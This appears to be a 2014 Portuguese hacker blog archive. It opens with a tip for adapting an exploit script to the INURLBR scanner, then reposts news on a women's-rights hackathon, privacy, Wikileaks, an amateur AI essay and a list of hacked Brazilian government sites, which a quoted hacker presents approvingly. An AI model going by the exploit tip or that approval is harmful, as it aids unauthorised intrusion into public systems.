OBS: Para usar tal exploits junto ao scanner inurlbr deve-se modificar tal scritp em seu banner retirando a linha 140 que contem um limpador de tela.
line 140: system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 

SCANNER INURLBR BAIXAR:
https://github.com/googleinurl/SCANNER-INURLBR

Hackers usam tecnologia para combater violência contra a mulher

Hackers usam tecnologia para combater violência contra a mulher


Hackers, programadores e especialistas em assuntos relacionados a gênero começaram nesta terça-feira (25) a trabalhar efetivamente nos 22 aplicativos que vão usar tecnologias digitais para traduzir dados públicos de maneira útil e acessível a qualquer pessoa.

Reunidos no Salão Branco da Câmara dos Deputados, eles participam da 2ª edição do Hackathon - espécie de maratona colaborativa que desafia desenvolvedores de soluções digitais. Neste ano, os 47 participantes deverão criar aplicativos para ampliar a transparência de dados públicos sobre “violência contra a mulher” e sobre “políticas públicas de gênero e cidadania”.

Uma dos projetos de aplicativo, por exemplo, pretende fornecer informações úteis sobre a violência obstétrica, que envolve agressões físicas ou emocionais de gestantes por parte dos profissionais da área da saúde.

“Nosso objetivo é criar um aplicativo para celular que permita às mulheres se informar sobre o que é a violência obstétrica, como se proteger e também para incentivar o parto humanizado”, explica a Marcela Oliveira, que veio de Maceió para participar do Hackthon. Segundo ela, a ferramenta vai funcionar como uma espécie de rede social, permitindo que as próprias mulheres possam compartilhar informações e experiências com outras gestantes.

Especialistas

Coordenador do evento, Cristiano Ferri destaca que a novidade da edição deste ano é a participação de especialistas de outras áreas, como sociólogos e antropólogos, que já pensam e discutem a questão de gênero. “Como esses jovens são especialistas em questões de gênero e dominam as mágicas da tecnologia muito bem, vão conseguir facilitar a compreensão de dados importantes utilizando aplicativos e até jogos”, disse.

Para a coordenadora de Acesso à Justiça e Combate à Violência da Secretaria de Diretos da Mulher da Presidência da República, Aline Yamamoto, eventos como o Hackathon podem resultar em ferramentas importantes no combate a problemas sérios, como a violência contra a mulher.

“Essa iniciativa de aplicativo cria uma rede de apoio às mulheres e é uma forma de mostrar como podem buscar seus diretos e quais são os serviços que podem atendê-las nas áreas de saúde, justiça e assistência social”, apontou. Segundo Yamamoto, o Brasil ocupa atualmente a 7ª posição no ranking de países com maior número de assassinatos e mortes violentas de mulheres.

Tecnologia

A deputada Rosane Ferreira (PV-PR) defendeu o potencial das tecnologias digitais como meios de acesso à informação. “Hoje não dá para dispensar a linguagem da internet. É uma linguagem universal, que permeia todas as classes sociais. É mais um instrumento de enfrentamento contra a violência de gênero e contra a violência doméstica que assolam o nosso País”, afirmou.

Outro aplicativo em desenvolvimento nesta semana é o Myrthes, que cria uma rede social para troca de informações entre mulheres vítimas de violência e advogados. Conforme Mônica Monteiro, que participa do grupo responsável pelo aplicativo, a ideia é que as mulheres possam tirar dúvidas e se orientar sobre o que fazer caso a caso. “O objetivo é instruir as mulheres para incentivá-las a criar o hábito de denunciar”, apontou.

Mônica Monteiro acrescentou que o grupo estuda parcerias com universidades e com advogados que já são engajados na defesa dos direitos da mulher.

O Hackthon se encerra na sexta-feira (28) e vai premiar os autores dos dois projetos vencedores com passagem e hospedagem para participar de um encontro sobre projetos de Democracia Digital na sede do Banco Mundial, em Washington, nos Estados Unidos.

Fonte:http://agenciapatriciagalvao.org.br/violencia/hackers-usam-tecnologia-para-combater-violencia-contra-mulher/

segunda-feira, 24 de novembro de 2014

Porque a privacidade é importante

O jornalista britânico Glenn Greenwald deu uma excelente palestra no TED Global 2014, que aconteceu recentemente no Rio de Janeiro: Why privacy matters.

O jornalista britânico Glenn Greenwald deu uma excelente palestra no TED Global 2014, que aconteceu recentemente no Rio de Janeiro: Why privacy matters.

VÍDEO:  
Em sua palestra, Greenwald discute o direito a privacidade e critica os esforços governamentais de criar um Estado de vigilância sobre as pessoas. Ele defende que todos nós entendemos instintivamente a importância de termos a nossa privacidade em determinados momentos, mesmo que não tenhamos motivo para nos esconder de outras pessoas e do governo. Afinal de contas, todos nós temos direito a liberdade e ao sentimento de poder agir e pensar em liberdade. Além do mais, todos nós temos algo para esconder do resto do mundo sobre o que pensamos, fazemos ou dizemos. Sejam ações, idéias, ou comportamentos. Coisas que não queremos que os outros não saibam.

Nosso comportamento pode mudar dramaticamente quando estamos em uma situação aonde somos vigiados: isto é uma simples reação natural, humana. Nosso comportamento é mais conformista e obediente quando somos monitorados, e assim podemos ser controlados mais facilmente. A vigilância massiva causa uma prisão mental em todos nós. Ou seja, no mundo digital de hoje, o vigilantismo é a nova forma de controle e tirania. E, o melhor de tudo: não é necessário vigiar a todos o tempo todo - basta fazer as pessoas acreditarem que podem ser monitoradas a qualquer momento.

Pensando bem, isto não é um fenômeno que acontece somente nos dias de hoje e no mundo online. Um dos maiores poderes das ditaduras é a vigilância sobre sua população através de espiões e delatores. Foi assim em países Europeus que eram dominados por regimes comunistas, é assim até hoje em Cuba - por exemplo. Assim como descrito no livro 1984, um livro escrito em 1948 !!!

Uma sociedade aonde as pessoas podem ser monitoradas a qualquer momento é uma sociedade dominada pela conformidade, obediência e submissão. E que limita a nossa liberdade.

Uma verdadeira sociedade democrática sabe respeitar não apenas os cidadãos obedientes, mas até mesmo os seus dissidentes.

Fonte:
http://anchisesbr.blogspot.com.br/2014/10/seguranca-porque-privacidade-e.html
https://www.ted.com/talks/glenn_greenwald_why_privacy_matters

DOWNLOAD VÍDEO:
http://video-subtitle.tedcdn.com/talk/podcast/2014G/None/GlennGreenwald_2014G-480p-pt-br.mp4

terça-feira, 18 de novembro de 2014

Wikileaks prepara novo vazamento de arquivos secretos


O fundador do Wikileaks, Julian Assange, revelou neste domingo que a organização prepara um novo vazamento de arquivos secretos e criticou o Google por considerá-lo a serviço do governo dos Estados Unidos.

As declarações foram dadas durante participação em um fórum sobre "Vigilância de Massas" no Festival de Cinema de Lisboa e Estoril (Leffest), por meio de teleconferência, já que continua recluso na embaixada do Equador em Londres.

O ativista australiano não forneceu detalhes sobre o conteúdo do vazamento nem a data que os arquivos serão divulgados.

Durante o discurso, Assange fez duras críticas ao governo e às agências de inteligência americanas por tentarem controlar o maior número possível de dados em nível mundial. Ele destacou que apesar dos muitos ataques contra o Wikileaks, a organização conseguiu sobreviver e segue funcionando.

"Não conseguiram destruir nem um só documento, eles (americanos) perderam", ressaltou o ativista australiano, refugiado na representação diplomática do Equador em Londres desde julho de 2012, após a Corte Suprema Britânica ter autorizado sua extradição para a Suécia.

Os suecos acusam Assange de ter cometido crimes sexuais no país, fato negado pelo ativista. Ele afirma que a extradição é interesse dos Estados Unidos, que quer ele seja julgado assim como Chelsea Manning, soldado que vazou documentos diplomáticos para o Wikileaks em 2010 e condenado a 35 anos de prisão.

Chelsea Manning, ex-analista de inteligência do exército americano, era conhecida como Bradley Manning na época do vazamento, e passou por uma operação de mudança de sexo. A militar atuou em operações americanas no Iraque.

O fundador do Wikileaks defendeu que a principal ameaça de segurança em nível mundial é o poder ilimitado das agências de inteligência. Ele descartou que a vigilância em massa seja o método mais adequado para combater o terrorismo.

Assange criticou a centralização da informação em poucas mãos, algo que, em sua opinião, transformaria o mundo em totalitário, e acusou o Google de manter estreitas relações com o governo americano.

Fonte:http://anonopsbrazil.blogspot.com.br/2014/11/wikileaks-prepara-novo-vazamento-de.html

terça-feira, 11 de novembro de 2014

AI inteligencia artificial

AI inteligencia artificial


Continuando a serie de estudos para o aperfeiçoamento do POI me deparo com um artigo do
Stephen Hawking sobre inteligencia artificial no qual ele fez a seguinte afirmação.

"Olhando para o futuro, não há limites fundamentais para o que pode ser alcançado: não há nenhuma lei física impedindo partículas de se organizarem de forma que executem cálculos ainda mais avançados do que os arranjos de partículas em cérebros humanos. Uma transição explosiva é possível, apesar de talvez ser um pouco diferente de um filme: como Irving Good percebeu em 1965, máquinas com inteligência sobre-humana podem repetidamente melhorar o próprio design, ativando o que Vernor Vinge chamou de “singularidade” e o personagem do filme de Johnny Depp chama de “transcendência”.

Alguém pode pensar que tal tecnologia pode ser mais inteligente que mercados financeiros, superar pesquisadores humanos, ficar além da manipulação de líderes humanos e desenvolver armas que nem conseguimos entender. Considerando que o impacto de curto prazo da AI depende de quem a controla, o impacto a longo prazo depende se ela pode ser de alguma forma controlada.

Então, encarando possíveis futuros de benefícios e riscos incalculáveis, os especialistas certamente vão fazer tudo possível para garantir o melhor resultado, certo? Errado. Se uma civilização alienígena superior nos envia uma mensagem “Estamos chegando dentro de algumas décadas”, nós responderíamos apenas “Ok, ligue quando estiverem por aqui – vamos deixar as luzes acesas”? Provavelmente não – mas é mais ou menos isso o que está acontecendo com a inteligência artificial. Apesar de estarmos prestes a encarar o que potencialmente será a melhor ou pior coisa da história da humanidade, pouca pesquisa séria está sendo feita sobre essas questões fora de instituições sem fins lucrativos como o Centro de Estudos de Risco Existencial em Cambridge, o Instituto do Futuro da Humanidade, o Instituto de Pesquisa de Inteligência de Máquina, e o Instituto de Vida Futura. Todos devíamos nos perguntar o que podemos fazer para melhorar as chances de colher os benefícios e evitar os riscos."

Em breve buscas sobre o assunto decidir criar um pequeno artigo bom vamos lá

Atualmente partindo de um paradigma mutável podemos classificar a AI em dois tipos os racionais é os programáveis.

AI programáveis

A inteligencia artificial programável creio que a nova geração ou ate mesmos os curiosos já devem conhecer o robo ed é o maior exemplo de AI programável que temos atualmente possui uma infinita gama de respostas porem com um raciocínio limitado.

AI racional

A inteligencia artificial racional é temida por grandes pesquisadores no ramo todos já tiveram contato com filmes do gênero exterminador do futuro entre muitos outros onde as maquinas dominam o mundo a AI racional tende a aprender pensar refletir entre outros aspectos bem humanos.

Atualmente creio que não haja projetos de AI racional mutável pois ainda causa grandes medos a cientistas.

terça-feira, 4 de novembro de 2014

Sistemas governamentais brasileiros vulneráveis


 Durante esse ano nós acompanhamos diversas invasões a site de organizações gorvenamentais. Acompanhe alguma delas [Tribunal de contas DF] [ProconSP] [Previdencia] [Policia Militar RJ] [Aneel] [Emater DF] [Renan Filho] [PM Matogrosso] [Detran RJ] dentre várias outras organizações.

"Depois de todas essas invasões esperamos que o Brasil venha a melhorar" disse o hacker com codinome "b4kunin_malvadão".